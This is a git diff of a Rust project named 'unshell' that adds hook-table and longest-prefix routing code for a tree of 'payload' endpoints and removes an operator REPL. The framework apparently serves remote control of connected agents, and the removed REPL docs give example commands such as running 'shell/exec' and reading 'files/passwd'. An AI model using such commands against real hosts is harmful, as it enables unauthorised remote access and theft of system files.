header = PacketHeader { + packet_type: PacketType::Fault, + src_path: self.path.clone(), + dst_path: key.return_path.clone(), + dst_leaf: None, + hook_id: Some(key.hook_id), + }; + let message = FaultMessage { fault }; + let frame = encode_packet(&header, &message)?; + Ok(EndpointOutcome { + forwards: vec![(RouteDecision::Parent, frame)], + ..EndpointOutcome::default() + }) + } + + fn decide_route(&self, dst_path: &[String]) -> RouteDecision { + let child_paths: Vec> = self + .children + .iter() + .filter(|child| child.state == ConnectionState::Registered) + .map(|child| child.path.clone()) + .collect(); + route_destination( + &self.path, + &child_paths, + self.parent_path.is_some(), + dst_path, + ) + } + + fn valid_source_for_ingress(&self, ingress: &Ingress, src_path: &[String]) -> bool { + match ingress { + Ingress::Parent => self + .parent_path + .as_ref() + .map_or(self.path.is_empty(), |path| path == src_path), + Ingress::Child(path) => path == src_path, + Ingress::Local => src_path == self.path, + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::protocol::introspection::ArchivedEndpointIntrospection; + use crate::protocol::{HookTarget, deserialize_archived_bytes}; + + fn echo_leaf() -> LeafSpec { + LeafSpec { + name: String::from("echo"), + procedures: vec![String::from("org.product.v1.echo.roundtrip")], + behavior: LeafBehavior::Echo, + } + } + + #[test] + fn introspection_returns_payload_and_clears_hook() { + let mut child = Endpoint::new( + vec![String::from("child")], + Some(Vec::new()), + Vec::new(), + vec![echo_leaf()], + ); + let header = PacketHeader { + packet_type: PacketType::Call, + src_path: Vec::new(), + dst_path: vec![String::from("child")], + dst_leaf: None, + hook_id: None, + }; + let call = CallMessage { + procedure_id: String::new(), + data: Vec::new(), + response_hook: Some(HookTarget { + hook_id: 1, + return_path: Vec::new(), + }), + }; + + let outcome = child + .receive( + &Ingress::Parent, + encode_packet(&header, &call).expect("frame"), + ) + .expect("receive should succeed"); + let (_, frame) = outcome + .forwards + .first() + .expect("forwarded frame should exist"); + let parsed = decode_frame(frame).expect("data frame"); + let data = parsed.deserialize_data().expect("data payload"); + let payload = deserialize_archived_bytes::< + ArchivedEndpointIntrospection, + EndpointIntrospection, + >(&data.data) + .expect("introspection payload"); + assert_eq!(payload.leaves.len(), 1); + assert_eq!(child.hooks().active_len(), 0); + } + + #[test] + fn invalid_peer_generates_local_fault_event() { + let mut root = Endpoint::new(Vec::new(), None, Vec::new(), Vec::new()); + let _call = root + .make_call( + vec![String::from("child")], + None, + String::from("org.product.v1.echo.roundtrip"), + Some(7), + Vec::new(), + ) + .expect("call should encode"); + let frame = root + .make_data( + Vec::new(), + 7, + String::from("org.product.v1.echo.roundtrip"), + b"bad".to_vec(), + false, + ) + .expect("data should encode"); + let parsed = decode_frame(&frame).expect("frame should decode"); + let mut header = parsed.deserialize_header(); + header.src_path = vec![String::from("other")]; + let bad_frame = encode_packet( + &header, + &parsed.deserialize_data().expect("data should decode"), + ) + .expect("bad frame should encode"); + let outcome = root + .receive(&Ingress::Child(vec![String::from("other")]), bad_frame) + .expect("receive should work"); + assert!(matches!( + outcome.events.first(), + Some(LocalEvent::Fault { .. }) + )); + } +} diff --git a/src/tree/hook.rs b/src/tree/hook.rs new file mode 100644 index 0000000..ae4599a --- /dev/null +++ b/src/tree/hook.rs @@ -0,0 +1,142 @@ +//! Hook state for pending and active protocol flows. + +use alloc::{collections::BTreeMap, string::String, vec::Vec}; + +/// Hook table key scoped to the hook host path. +#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord)] +pub struct HookKey { + /// Path of the endpoint hosting the hook. + pub return_path: Vec, + /// Hook identifier scoped to `return_path`. + pub hook_id: u64, +} + +impl HookKey { + /// Creates a new hook key. + pub fn new(return_path: Vec, hook_id: u64) -> Self { + Self { + return_path, + hook_id, + } + } +} + +/// Pending hook context created by a received call. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct PendingHook { + /// Original caller path. + pub caller_src_path: Vec, + /// Hook host path. + pub return_path: Vec, + /// Hook identifier. + pub hook_id: u64, + /// Procedure anchored to the call. + pub procedure_id: String, + /// Destination leaf from the call. + pub dst_leaf: Option, +} + +/// Active hook context used for ordinary data traffic. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct ActiveHook { + /// Path of the endpoint hosting the hook. + pub return_path: Vec, + /// Hook identifier. + pub hook_id: u64, + /// Expected direct peer for hook traffic. + pub peer_path: Vec, + /// Procedure bound to the hook. + pub procedure_id: String, + /// Original destination leaf. + pub dst_leaf: Option, + /// Whether the peer has indicated completion. + pub peer_finished: bool, +} + +/// Durable hook state tables. +#[derive(Debug, Default)] +pub struct HookTable { + pending: BTreeMap, + active: BTreeMap, +} + +impl HookTable { + /// Allocates the lowest inactive hook id for a return path. + pub fn allocate_hook_id(&self, return_path: &[String]) -> u64 { + let mut hook_id = 0u64; + loop { + let key = HookKey::new(return_path.to_vec(), hook_id); + if !self.pending.contains_key(&key) && !self.active.contains_key(&key) { + return hook_id; + } + hook_id = hook_id.saturating_add(1); + } + } + + /// Inserts pending hook state. + pub fn insert_pending(&mut self, pending: PendingHook) { + // WARNING: hook tables intentionally own their path and procedure strings. + // Hook state must outlive any individual frame buffer, so borrowing framed + // transport memory here would be unsound. + let key = HookKey::new(pending.return_path.clone(), pending.hook_id); + self.pending.insert(key, pending); + } + + /// Inserts active hook state. + pub fn insert_active(&mut self, active: ActiveHook) { + let key = HookKey::new(active.return_path.clone(), active.hook_id); + self.active.insert(key, active); + } + + /// Promotes pending hook state to active state. + pub fn activate_pending(&mut self, key: &HookKey, peer_path: Vec) -> Option<()> { + let pending = self.pending.remove(key)?; + self.active.insert( + key.clone(), + ActiveHook { + return_path: pending.return_path, + hook_id: pending.hook_id, + peer_path, + procedure_id: pending.procedure_id, + dst_leaf: pending.dst_leaf, + peer_finished: false, + }, + ); + Some(()) + } + + /// Removes pending state. + pub fn remove_pending(&mut self, key: &HookKey) -> Option { + self.pending.remove(key) + } + + /// Removes active state. + pub fn remove_active(&mut self, key: &HookKey) -> Option { + self.active.remove(key) + } + + /// Returns pending state. + pub fn pending(&self, key: &HookKey) -> Option<&PendingHook> { + self.pending.get(key) + } + + /// Returns active state. + pub fn active(&self, key: &HookKey) -> Option<&ActiveHook> { + self.active.get(key) + } + + /// Returns mutable active state. + pub fn active_mut(&mut self, key: &HookKey) -> Option<&mut ActiveHook> { + self.active.get_mut(key) + } + + /// Returns the number of pending hooks. + pub fn pending_len(&self) -> usize { + self.pending.len() + } + + /// Returns the number of active hooks. + pub fn active_len(&self) -> usize { + self.active.len() + } +} diff --git a/src/tree/mod.rs b/src/tree/mod.rs index 340e888..fc593ca 100644 --- a/src/tree/mod.rs +++ b/src/tree/mod.rs @@ -1,520 +1,12 @@ -//! # Tree Module -//! -//! The `Tree` dispatches incoming [`TreeRequest`]s to registered [`Endpoint`]s -//! by matching the request's destination path. -//! -//! ## Path matching -//! -//! Paths are `/`-delimited strings. An `Endpoint` is registered at a path prefix. -//! A request matches an endpoint if the endpoint's path is a prefix of the request path. -//! When multiple endpoints match, the one with the **longest** prefix wins. -//! -//! ```text -//! Registered endpoints: Request path: -//! /shell ← prefix /shell/exec → matches /shell -//! /files ← prefix /files/read → matches /files -//! /shell/exec ← more specific /shell/exec → matches /shell/exec (longer) -//! ``` -//! -//! ## Usage -//! -//! ```rust -//! use unshell::tree::{Tree, Endpoint}; -//! use unshell::protocol::{ -//! TreeRequest, TreeResponse, RequestType, ResponseStatus, content, -//! }; -//! -//! /// A simple echo endpoint that reflects the request data back. -//! struct EchoEndpoint; -//! -//! impl Endpoint for EchoEndpoint { -//! fn handle(&mut self, request: TreeRequest) -> TreeResponse { -//! TreeResponse { -//! request_id: request.request_id, -//! status: ResponseStatus::Ok, -//! content_type: request.content_type.clone(), -//! data: request.data.clone(), -//! } -//! } -//! } -//! -//! let mut tree = Tree::new(); -//! tree.register("/echo", EchoEndpoint); -//! -//! let response = tree.dispatch(TreeRequest { -//! request_id: 1, -//! request_type: RequestType::Read, -//! content_type: content::UTF8_STRING.into(), -//! data: b"hello".to_vec(), -//! }, "/echo/anything"); -//! -//! assert_eq!(response.status, ResponseStatus::Ok); -//! assert_eq!(response.data, b"hello"); -//! ``` +//! Explicit tree declaration, routing, and a small endpoint runtime. -extern crate alloc; -use alloc::borrow::ToOwned; -use alloc::boxed::Box; -use alloc::string::String; -use alloc::vec::Vec; +mod endpoint; +mod hook; +mod routing; -use crate::protocol::{ - content, ResponseStatus, TreeRequest, TreeResponse, +pub use endpoint::{ + ChildRoute, ConnectionState, Endpoint, EndpointError, EndpointOutcome, Ingress, LeafBehavior, + LeafSpec, LocalEvent, }; - -// --------------------------------------------------------------------------- -// Endpoint trait -// --------------------------------------------------------------------------- - -/// A module that handles [`TreeRequest`]s at a registered path. -/// -/// Implement this trait to add capabilities to a payload. The `Tree` calls -/// `handle` when a request's path matches this endpoint's registration prefix. -/// -/// # Example -/// -/// ```rust -/// use unshell::tree::Endpoint; -/// use unshell::protocol::{TreeRequest, TreeResponse, ResponseStatus, content}; -/// -/// struct PingEndpoint; -/// -/// impl Endpoint for PingEndpoint { -/// fn handle(&mut self, request: TreeRequest) -> TreeResponse { -/// TreeResponse { -/// request_id: request.request_id, -/// status: ResponseStatus::Ok, -/// content_type: content::UTF8_STRING.into(), -/// data: b"pong".to_vec(), -/// } -/// } -/// } -/// ``` -pub trait Endpoint: Send { - /// Handle a request and return a response. - /// - /// This method is called synchronously on the recv loop thread. It should - /// not block for extended periods. For long-running operations, spawn a - /// background thread and return immediately with a `pending` response - /// (streaming responses are a future protocol feature). - fn handle(&mut self, request: TreeRequest) -> TreeResponse; -} - -// --------------------------------------------------------------------------- -// Tree -// --------------------------------------------------------------------------- - -/// A path-addressed dispatcher that routes [`TreeRequest`]s to [`Endpoint`]s. -/// -/// # Path matching algorithm -/// -/// The tree uses **longest-prefix matching**: -/// 1. Split the request path by `/`. -/// 2. For each registered endpoint, check if the endpoint's path components -/// are a prefix of the request path components. -/// 3. Among all matching endpoints, return the one with the most components -/// (the most specific match). -/// 4. If no match: return a [`ResponseStatus::NoBranchError`] response. -/// -/// # Example -/// -/// ```rust -/// use unshell::tree::{Tree, Endpoint}; -/// use unshell::protocol::{TreeRequest, TreeResponse, RequestType, ResponseStatus, content}; -/// -/// struct Shell; -/// -/// impl Endpoint for Shell { -/// fn handle(&mut self, req: TreeRequest) -> TreeResponse { -/// TreeResponse { -/// request_id: req.request_id, -/// status: ResponseStatus::Ok, -/// content_type: content::UTF8_STRING.into(), -/// data: b"shell output".to_vec(), -/// } -/// } -/// } -/// -/// let mut tree = Tree::new(); -/// tree.register("/shell", Shell); -/// -/// // A request to /shell/exec/anything matches /shell (the registered prefix). -/// let resp = tree.dispatch( -/// TreeRequest { -/// request_id: 1, -/// request_type: RequestType::CallProcedure, -/// content_type: content::NONE.into(), -/// data: Vec::new(), -/// }, -/// "/shell/exec", -/// ); -/// assert_eq!(resp.status, ResponseStatus::Ok); -/// ``` -pub struct Tree { - /// Registered endpoints with their path prefixes. - /// - /// The path is stored as a `Vec` of components (split on `/`, - /// empty leading component from the leading `/` is discarded). - endpoints: Vec<(Vec, Box)>, -} - -impl Tree { - /// Create an empty tree with no registered endpoints. - #[must_use] - pub fn new() -> Self { - Self { - endpoints: Vec::new(), - } - } - - /// Register an endpoint at the given path prefix. - /// - /// # Arguments - /// - /// * `path` — the path prefix this endpoint owns, e.g. `"/shell"`. - /// Leading `/` is stripped; components are split on `/`. - /// * `endpoint` — the handler that will receive matching requests. - /// - /// # Panics - /// - /// Does not panic. Registering the same path twice is allowed; the second - /// registration shadows the first for that exact path (longest-prefix - /// matching still applies for sub-paths). - /// - /// # Example - /// - /// ```rust - /// use unshell::tree::{Tree, Endpoint}; - /// use unshell::protocol::{TreeRequest, TreeResponse, ResponseStatus, content}; - /// - /// struct Noop; - /// impl Endpoint for Noop { - /// fn handle(&mut self, req: TreeRequest) -> TreeResponse { - /// TreeResponse { - /// request_id: req.request_id, - /// status: ResponseStatus::Ok, - /// content_type: content::NONE.into(), - /// data: Vec::new(), - /// } - /// } - /// } - /// - /// let mut tree = Tree::new(); - /// tree.register("/shell", Noop); - /// ``` - pub fn register(&mut self, path: &str, endpoint: E) { - let components = split_path(path); - self.endpoints.push((components, Box::new(endpoint))); - } - - /// Dispatch a request to the best-matching endpoint. - /// - /// Returns a [`TreeResponse`] with [`ResponseStatus::NoBranchError`] - /// if no registered endpoint matches the request path. - /// - /// # Arguments - /// - /// * `request` — the incoming request. - /// * `dst_path` — the destination path from the packet header. - /// - /// # Example - /// - /// ```rust - /// use unshell::tree::Tree; - /// use unshell::protocol::{TreeRequest, RequestType, ResponseStatus, content}; - /// - /// let mut tree = Tree::new(); - /// // (register some endpoints here) - /// - /// let resp = tree.dispatch( - /// TreeRequest { - /// request_id: 99, - /// request_type: RequestType::Read, - /// content_type: content::NONE.into(), - /// data: Vec::new(), - /// }, - /// "/unknown/path", - /// ); - /// assert_eq!(resp.status, ResponseStatus::NoBranchError); - /// ``` - pub fn dispatch(&mut self, request: TreeRequest, dst_path: &str) -> TreeResponse { - let path_components = split_path(dst_path); - - // Find the endpoint with the longest matching prefix. - let best = self - .endpoints - .iter_mut() - .filter(|(ep_path, _)| is_prefix(ep_path, &path_components)) - .max_by_key(|(ep_path, _)| ep_path.len()); - - match best { - Some((_, endpoint)) => endpoint.handle(request), - None => TreeResponse { - request_id: request.request_id, - status: ResponseStatus::NoBranchError, - content_type: content::NONE.into(), - data: Vec::new(), - }, - } - } - - /// Return the list of registered path prefixes. - /// - /// Used during handshake to tell the router which paths this tree owns. - /// - /// # Example - /// - /// ```rust - /// use unshell::tree::{Tree, Endpoint}; - /// use unshell::protocol::{TreeRequest, TreeResponse, ResponseStatus, content}; - /// - /// struct Noop; - /// impl Endpoint for Noop { - /// fn handle(&mut self, req: TreeRequest) -> TreeResponse { - /// TreeResponse { - /// request_id: req.request_id, - /// status: ResponseStatus::Ok, - /// content_type: content::NONE.into(), - /// data: Vec::new(), - /// } - /// } - /// } - /// - /// let mut tree = Tree::new(); - /// tree.register("/shell", Noop); - /// tree.register("/files", Noop); - /// - /// let paths = tree.registered_paths("/agents/abc123"); - /// assert!(paths.contains(&"/agents/abc123/shell".to_string())); - /// assert!(paths.contains(&"/agents/abc123/files".to_string())); - /// ``` - #[must_use] - pub fn registered_paths(&self, base_prefix: &str) -> Vec { - let base = base_prefix.trim_end_matches('/'); - self.endpoints - .iter() - .map(|(components, _)| { - let sub = components.join("/"); - if sub.is_empty() { - base.to_owned() - } else { - alloc::format!("{base}/{sub}") - } - }) - .collect() - } -} - -impl Default for Tree { - fn default() -> Self { - Self::new() - } -} - -// --------------------------------------------------------------------------- -// Path utilities -// --------------------------------------------------------------------------- - -/// Split a path string into its components. -/// -/// Leading `/` and empty segments are discarded. -/// -/// ```text -/// "/shell/exec" → ["shell", "exec"] -/// "/shell/" → ["shell"] -/// "shell" → ["shell"] -/// "/" → [] -/// ``` -fn split_path(path: &str) -> Vec { - path.split('/') - .filter(|s| !s.is_empty()) - .map(String::from) - .collect() -} - -/// Returns `true` if `prefix` is a prefix of (or equal to) `path`. -/// -/// Both are slices of path components (already split on `/`). -/// -/// ```text -/// prefix = ["shell"] path = ["shell", "exec"] → true -/// prefix = ["shell", "exec"] path = ["shell", "exec"] → true (exact match) -/// prefix = ["shell", "exec"] path = ["shell"] → false (prefix longer) -/// prefix = ["files"] path = ["shell", "exec"] → false (different root) -/// ``` -fn is_prefix(prefix: &[String], path: &[String]) -> bool { - if prefix.len() > path.len() { - return false; - } - prefix.iter().zip(path.iter()).all(|(a, b)| a == b) -} - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - use crate::protocol::{RequestType, ResponseStatus, content}; - - // A minimal endpoint that echoes the request data. - struct Echo; - impl Endpoint for Echo { - fn handle(&mut self, req: TreeRequest) -> TreeResponse { - TreeResponse { - request_id: req.request_id, - status: ResponseStatus::Ok, - content_type: req.content_type, - data: req.data, - } - } - } - - // A minimal endpoint that always returns a fixed string. - struct Fixed(&'static str); - impl Endpoint for Fixed { - fn handle(&mut self, req: TreeRequest) -> TreeResponse { - TreeResponse { - request_id: req.request_id, - status: ResponseStatus::Ok, - content_type: content::UTF8_STRING.into(), - data: self.0.as_bytes().to_vec(), - } - } - } - - fn make_req(id: u64) -> TreeRequest { - TreeRequest { - request_id: id, - request_type: RequestType::Read, - content_type: content::NONE.into(), - data: Vec::new(), - } - } - - /// A single endpoint is matched correctly. - #[test] - fn single_endpoint_match() { - let mut tree = Tree::new(); - tree.register("/shell", Echo); - - let resp = tree.dispatch(make_req(1), "/shell/exec"); - assert_eq!(resp.status, ResponseStatus::Ok, "expected Ok for /shell/exec"); - assert_eq!(resp.request_id, 1); - } - - /// When two endpoints are registered, the second one is also reachable. - /// - /// This test specifically catches the old `return None` bug in `get_endpoint`: - /// the first endpoint (/files) doesn't match /shell/exec, so the tree must - /// continue to the second entry (/shell). - #[test] - fn second_endpoint_match() { - let mut tree = Tree::new(); - tree.register("/files", Fixed("files")); - tree.register("/shell", Fixed("shell")); - - let resp = tree.dispatch(make_req(2), "/shell/exec"); - assert_eq!(resp.status, ResponseStatus::Ok); - assert_eq!(resp.data, b"shell"); - } - - /// No matching endpoint returns NoBranchError. - #[test] - fn no_match_returns_no_branch_error() { - let mut tree = Tree::new(); - tree.register("/shell", Echo); - - let resp = tree.dispatch(make_req(3), "/nonexistent/path"); - assert_eq!(resp.status, ResponseStatus::NoBranchError); - assert_eq!(resp.request_id, 3); - } - - /// Longer (more specific) prefix wins over shorter prefix. - #[test] - fn longer_prefix_wins() { - let mut tree = Tree::new(); - tree.register("/shell", Fixed("short")); - tree.register("/shell/exec", Fixed("long")); - - let resp = tree.dispatch(make_req(4), "/shell/exec/anything"); - assert_eq!(resp.data, b"long", "longer prefix should win"); - } - - /// A request path that is shorter than the registered prefix does not match. - #[test] - fn prefix_does_not_overmatch() { - let mut tree = Tree::new(); - tree.register("/shell/exec/something", Echo); - - // /shell/exec is shorter than the registered path — should NOT match - let resp = tree.dispatch(make_req(5), "/shell/exec"); - assert_eq!(resp.status, ResponseStatus::NoBranchError); - } - - /// `registered_paths` returns all prefixes with the base path prepended. - #[test] - fn registered_paths_prepends_base() { - let mut tree = Tree::new(); - tree.register("/shell", Echo); - tree.register("/files", Echo); - - let paths = tree.registered_paths("/agents/abc123"); - assert!(paths.contains(&"/agents/abc123/shell".to_string())); - assert!(paths.contains(&"/agents/abc123/files".to_string())); - assert_eq!(paths.len(), 2); - } - - // ----------------------------------------------------------------------- - // Path utility tests - // ----------------------------------------------------------------------- - - #[test] - fn split_path_leading_slash() { - assert_eq!(split_path("/shell/exec"), vec!["shell", "exec"]); - } - - #[test] - fn split_path_no_leading_slash() { - assert_eq!(split_path("shell/exec"), vec!["shell", "exec"]); - } - - #[test] - fn split_path_trailing_slash() { - assert_eq!(split_path("/shell/"), vec!["shell"]); - } - - #[test] - fn split_path_root() { - let result: Vec = split_path("/"); - assert!(result.is_empty()); - } - - #[test] - fn is_prefix_exact_match() { - let p = split_path("/shell/exec"); - assert!(is_prefix(&p, &p)); - } - - #[test] - fn is_prefix_valid() { - let prefix = split_path("/shell"); - let path = split_path("/shell/exec"); - assert!(is_prefix(&prefix, &path)); - } - - #[test] - fn is_prefix_prefix_too_long() { - let prefix = split_path("/shell/exec"); - let path = split_path("/shell"); - assert!(!is_prefix(&prefix, &path)); - } - - #[test] - fn is_prefix_different_root() { - let prefix = split_path("/files"); - let path = split_path("/shell/exec"); - assert!(!is_prefix(&prefix, &path)); - } -} +pub use hook::{ActiveHook, HookKey, HookTable, PendingHook}; +pub use routing::{LeafNode, RouteDecision, TreeNode, is_prefix, route_destination}; diff --git a/src/tree/routing.rs b/src/tree/routing.rs new file mode 100644 index 0000000..c54c8ba --- /dev/null +++ b/src/tree/routing.rs @@ -0,0 +1,150 @@ +//! Path routing helpers and explicit enum tree declarations. + +use alloc::{string::String, vec::Vec}; + +/// Explicit test tree declaration. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum TreeNode { + /// The tree root. + Root { children: Vec }, + /// A concrete endpoint in the tree. + Endpoint { + segment: String, + leaves: Vec, + children: Vec, + }, +} + +/// Leaf declaration used inside the explicit tree enum. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct LeafNode { + /// Local leaf name. + pub name: String, + /// Supported procedures. + pub procedures: Vec, +} + +impl TreeNode { + /// Flattens the tree into absolute endpoint paths. + pub fn paths(&self) -> Vec> { + let mut output = Vec::new(); + self.collect_paths(&[], &mut output); + output + } + + fn collect_paths(&self, prefix: &[String], output: &mut Vec>) { + match self { + Self::Root { children } => { + output.push(Vec::new()); + for child in children { + child.collect_paths(&[], output); + } + } + Self::Endpoint { + segment, children, .. + } => { + let mut next = prefix.to_vec(); + next.push(segment.clone()); + output.push(next.clone()); + for child in children { + child.collect_paths(&next, output); + } + } + } + } +} + +/// Longest-prefix route decision. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum RouteDecision { + /// Forward to the child at the given index. + Child(usize), + /// Deliver locally. + Local, + /// Forward upward toward the parent. + Parent, + /// Silently drop. + Drop, +} + +/// Returns `true` if `prefix` is a prefix of `path`. +pub fn is_prefix(prefix: &[String], path: &[String]) -> bool { + prefix.len() <= path.len() + && prefix + .iter() + .zip(path.iter()) + .all(|(left, right)| left == right) +} + +/// Routes a destination path using the protocol's longest-prefix rule. +pub fn route_destination( + local_path: &[String], + child_paths: &[Vec], + has_parent: bool, + dst_path: &[String], +) -> RouteDecision { + let child = child_paths + .iter() + .enumerate() + .filter(|(_, child_path)| is_prefix(child_path, dst_path)) + .max_by_key(|(_, child_path)| child_path.len()) + .map(|(index, _)| index); + + if let Some(index) = child { + return RouteDecision::Child(index); + } + if local_path == dst_path { + return RouteDecision::Local; + } + if has_parent && !is_prefix(local_path, dst_path) { + return RouteDecision::Parent; + } + RouteDecision::Drop +} + +#[cfg(test)] +mod tests { + use super::*; + use alloc::{string::String, vec}; + + #[test] + fn longest_prefix_wins() { + let children = vec![ + vec![String::from("a")], + vec![String::from("a"), String::from("b")], + ]; + assert_eq!( + route_destination( + &Vec::::new(), + &children, + false, + &[String::from("a"), String::from("b"), String::from("c")] + ), + RouteDecision::Child(1) + ); + } + + #[test] + fn tree_enum_flattens_paths() { + let tree = TreeNode::Root { + children: vec![TreeNode::Endpoint { + segment: String::from("a"), + leaves: Vec::new(), + children: vec![TreeNode::Endpoint { + segment: String::from("b"), + leaves: Vec::new(), + children: Vec::new(), + }], + }], + }; + + assert_eq!( + tree.paths(), + vec![ + Vec::::new(), + vec![String::from("a")], + vec![String::from("a"), String::from("b")], + ] + ); + } +} diff --git a/ush-cli/Cargo.toml b/ush-cli/Cargo.toml deleted file mode 100644 index 3ee4f44..0000000 --- a/ush-cli/Cargo.toml +++ /dev/null @@ -1,28 +0,0 @@ -# ============================================================================= -# ush-cli — The UnShell Operator REPL -# ============================================================================= -# -# The operator CLI is a first-class node in the UnShell network, just like a -# payload. It connects to the router, registers at /operator/, -# and provides an interactive REPL for issuing commands to connected payloads. -# -# Run with: -# cargo run -p ush-cli -- --router 127.0.0.1:9000 -# -# The CLI binary is NOT no_std — it uses the full standard library. - -[package] -name = "ush-cli" -version.workspace = true -edition.workspace = true -description = "UnShell operator REPL binary" - -[dependencies] -unshell = { workspace = true, features = ["tcp", "log"] } -crossbeam-channel = { workspace = true } -thiserror = { workspace = true } -rkyv = { workspace = true } -rustyline = "18.0.0" - -[lints] -workspace = true diff --git a/ush-cli/src/commands.rs b/ush-cli/src/commands.rs deleted file mode 100644 index 9ad520e..0000000 --- a/ush-cli/src/commands.rs +++ /dev/null @@ -1,189 +0,0 @@ -//! # REPL Command Parser -//! -//! Parses lines typed in the operator REPL into structured `Command` values. -//! -//! ## Supported commands -//! -//! | Command | Description | -//! |---|---| -//! | `list` | List all connected nodes | -//! | `use ` | Set the current working path | -//! | `ls [path]` | List procedures at `path` (or current path) | -//! | `call [data]` | Call a procedure at `path` | -//! | `read ` | Read a value at `path` | -//! | `write ` | Write a value to `path` | -//! | `background` | Background the current session | -//! | `sessions` | List backgrounded sessions | -//! | `exit` | Disconnect and quit | -//! | `help` | Print this help | - -/// A parsed REPL command. -#[derive(Debug, Clone, PartialEq)] -pub enum Command { - /// `list` — list all connected nodes via `/router/nodes`. - List, - /// `use ` — set the current working path. - Use(String), - /// `ls [path]` — `GetProcedures` at the given or current path. - Ls(Option), - /// `call [data]` — `CallProcedure` at `path` with optional `data`. - Call { path: String, data: Option }, - /// `read ` — `Read` at `path`. - Read(String), - /// `write ` — `Write` at `path` with `data`. - Write { path: String, data: String }, - /// `background` — push current session to background list. - Background, - /// `sessions` — list backgrounded sessions. - Sessions, - /// `exit` — disconnect and quit. - Exit, - /// `help` — print command help. - Help, -} - -/// Parse a line of input into a `Command`. -/// -/// Returns `None` if the line is empty or a comment (`#`). -/// Returns `Err` if the line cannot be parsed as a valid command. -/// -/// # Example -/// -/// ```rust -/// use ush_cli::commands::{parse, Command}; -/// -/// assert_eq!(parse("list").unwrap(), Some(Command::List)); -/// assert_eq!(parse("use /agents/abc123").unwrap(), Some(Command::Use("/agents/abc123".into()))); -/// assert_eq!(parse("").unwrap(), None); -/// assert_eq!(parse(" # comment").unwrap(), None); -/// ``` -/// -/// # Errors -/// -/// Returns an error string if the command name is unrecognised or the -/// arguments are malformed. -pub fn parse(line: &str) -> Result, String> { - let trimmed = line.trim(); - - // Empty lines and comments - if trimmed.is_empty() || trimmed.starts_with('#') { - return Ok(None); - } - - let mut parts = trimmed.splitn(3, ' '); - let cmd = parts.next().unwrap_or(""); - let arg1 = parts.next().map(str::trim); - let arg2 = parts.next().map(str::trim); - - match cmd { - "list" => Ok(Some(Command::List)), - "use" => { - let path = arg1.ok_or("usage: use ")?; - Ok(Some(Command::Use(path.to_owned()))) - } - "ls" => Ok(Some(Command::Ls(arg1.map(str::to_owned)))), - "call" => { - let path = arg1.ok_or("usage: call [data]")?; - Ok(Some(Command::Call { - path: path.to_owned(), - data: arg2.map(str::to_owned), - })) - } - "read" => { - let path = arg1.ok_or("usage: read ")?; - Ok(Some(Command::Read(path.to_owned()))) - } - "write" => { - let path = arg1.ok_or("usage: write ")?; - let data = arg2.ok_or("usage: write ")?; - Ok(Some(Command::Write { - path: path.to_owned(), - data: data.to_owned(), - })) - } - "background" | "bg" => Ok(Some(Command::Background)), - "sessions" => Ok(Some(Command::Sessions)), - "exit" | "quit" | "q" => Ok(Some(Command::Exit)), - "help" | "?" => Ok(Some(Command::Help)), - other => Err(format!("unknown command: {other}. Type 'help' for a list.")), - } -} - -/// Print the help text for all available commands. -pub fn print_help() { - println!("Available commands:"); - println!(" list List all connected nodes"); - println!(" use Set working path (e.g., use agents/abc123)"); - println!(" ls [path] List available procedures"); - println!(" call [data] Call a procedure"); - println!(" read Read a value"); - println!(" write Write a value"); - println!(" background Background current session"); - println!(" sessions List backgrounded sessions"); - println!(" exit Disconnect and quit"); -} - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn parse_empty() { - assert_eq!(parse("").unwrap(), None); - assert_eq!(parse(" ").unwrap(), None); - assert_eq!(parse("# comment").unwrap(), None); - } - - #[test] - fn parse_list() { - assert_eq!(parse("list").unwrap(), Some(Command::List)); - } - - #[test] - fn parse_use() { - assert_eq!( - parse("use /agents/abc123").unwrap(), - Some(Command::Use("/agents/abc123".into())) - ); - } - - #[test] - fn parse_ls_no_arg() { - assert_eq!(parse("ls").unwrap(), Some(Command::Ls(None))); - } - - #[test] - fn parse_ls_with_arg() { - assert_eq!( - parse("ls shell").unwrap(), - Some(Command::Ls(Some("shell".into()))) - ); - } - - #[test] - fn parse_call_with_data() { - assert_eq!( - parse("call shell/exec ls -la").unwrap(), - Some(Command::Call { - path: "shell/exec".into(), - data: Some("ls -la".into()), - }) - ); - } - - #[test] - fn parse_exit_aliases() { - assert_eq!(parse("exit").unwrap(), Some(Command::Exit)); - assert_eq!(parse("quit").unwrap(), Some(Command::Exit)); - assert_eq!(parse("q").unwrap(), Some(Command::Exit)); - } - - #[test] - fn parse_unknown_command() { - assert!(parse("foobar").is_err()); - } -} diff --git a/ush-cli/src/main.rs b/ush-cli/src/main.rs deleted file mode 100644 index da7a43d..0000000 --- a/ush-cli/src/main.rs +++ /dev/null @@ -1,33 +0,0 @@ -//! # ush-cli — UnShell Operator REPL -//! -//! The operator CLI connects to the router as a first-class node and provides -//! an interactive shell for issuing commands to connected payload nodes. -//! -//! ## Usage -//! -//! ```text -//! ush-cli --router 127.0.0.1:9000 -//! ``` -//! -//! ## REPL commands -//! -//! ```text -//! unshell> list # list all connected nodes -//! unshell> use agents/abc123 # set working path prefix -//! unshell [agents/abc123]> ls # GetProcedures at current path -//! unshell [agents/abc123]> call shell/exec "ls -la" -//! unshell [agents/abc123]> read files/passwd -//! unshell [agents/abc123]> background # detach, keep in session list -//! unshell> sessions # list background sessions -//! unshell> exit # disconnect and quit -//! ``` - -mod commands; -mod repl; -mod session; - -fn main() { - // TODO: parse --router argument - let router_addr = "127.0.0.1:9000"; - repl::run(router_addr).expect("repl failed"); -} diff --git a/ush-cli/src/repl.rs b/ush-cli/src/repl.rs deleted file mode 100644 index d253a11..0000000 --- a/ush-cli/src/repl.rs +++ /dev/null @@ -1,336 +0,0 @@ -//! # REPL Core -//! -//! The main interactive loop for the operator CLI. -//! -//! ## Flow -//! -//! ```text -//! run() -//! ↓ -//! connect to router → handshake → register as operator node -//! ↓ -//! start recv thread (router → operator messages) -//! ↓ -//! main thread: readline loop -//! parse command -//! execute (may send TreeRequest over transport) -//! print response -//! ``` -//! -//! ## Threading model 